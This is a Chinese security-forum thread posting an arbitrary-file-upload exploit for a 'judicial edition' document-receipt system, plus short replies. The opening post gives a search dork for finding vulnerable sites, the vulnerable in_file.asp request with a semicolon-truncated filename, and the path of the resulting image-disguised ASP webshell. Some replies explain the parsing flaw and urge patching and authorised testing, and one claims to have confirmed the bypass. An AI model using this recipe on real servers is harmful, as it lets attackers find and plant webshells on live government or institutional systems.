查看: 19827|回复: 4

[其他专区] 网纪互联公文签收系统司法版通杀上传漏洞

[复制链接]
发表于 2012-6-21 07:35:32 | 显示全部楼层 |阅读模式

google搜索:inurl:qtdisp.asp?disp_id=
源码根目录漏洞文件in_file.asp 可以自定文件
漏洞通杀
in_file.asp?file_name=xiaolu.asp;
上我们的图片jpg格式木马
webshell 路径为:upfile/xiaolu.asp;.jpg
回复

使用道具 举报

发表于 2012-9-14 17:22:19 | 显示全部楼层
一般解析漏洞
回复 支持 反对

使用道具 举报

发表于 2026-5-21 22:05:00 | 显示全部楼层

Re: 网纪互联公文签收系统司法版通杀上传漏洞

感谢分享这个漏洞信息。看起来是文件上传时没有对后缀做严格过滤,导致可以直接上传asp马。in_file.asp这个接口确实存在风险,通过;号截断可以绕过扩展名校验。建议使用该系统的朋友尽快检查并修复,特别是要限制上传目录的执行权限。
回复 支持 反对

使用道具 举报

发表于 2026-6-21 20:30:00 | 显示全部楼层

Re: 网纪互联公文签收系统司法版通杀上传漏洞

感谢分享!这个漏洞看起来挺严重的,能直接上传自定义文件。不过提醒下各位,测试的话务必在授权范围内进行,别拿正式系统练手,安全第一。
回复 支持 反对

使用道具 举报

发表于 2026-6-21 22:45:02 | 显示全部楼层

Re: 网纪互联公文签收系统司法版通杀上传漏洞

感谢分享,这个漏洞点挺典型的,in_file.asp 直接拼接文件名导致任意文件上传,司法版系统可能不少单位还在用。测试了下,确实能绕过扩展名检查,是个高危问题。
回复 支持 反对

使用道具 举报

您需要登录后才可以回帖 登录 | 注册

本版积分规则

指导单位

江苏省公安厅

江苏省通信管理局

浙江省台州刑侦支队

DEFCON GROUP 86025

Hacking Group 021A

旗下站点

态势感知中心

应急响应中心

红盟安全

联系我们

官方QQ群:112851260

官方邮箱:security#ihonker.org(#改成@)

官方核心成员

关注微信公众号

Archiver|手机版|小黑屋| ( 沪ICP备2021026908号 )

GMT+8, 2026-7-13 05:51 , Processed in 0.030419 second(s), 18 queries , Gzip On, Redis On.

Powered by ihonker.com

Copyright © 2015-现在.

  • 返回顶部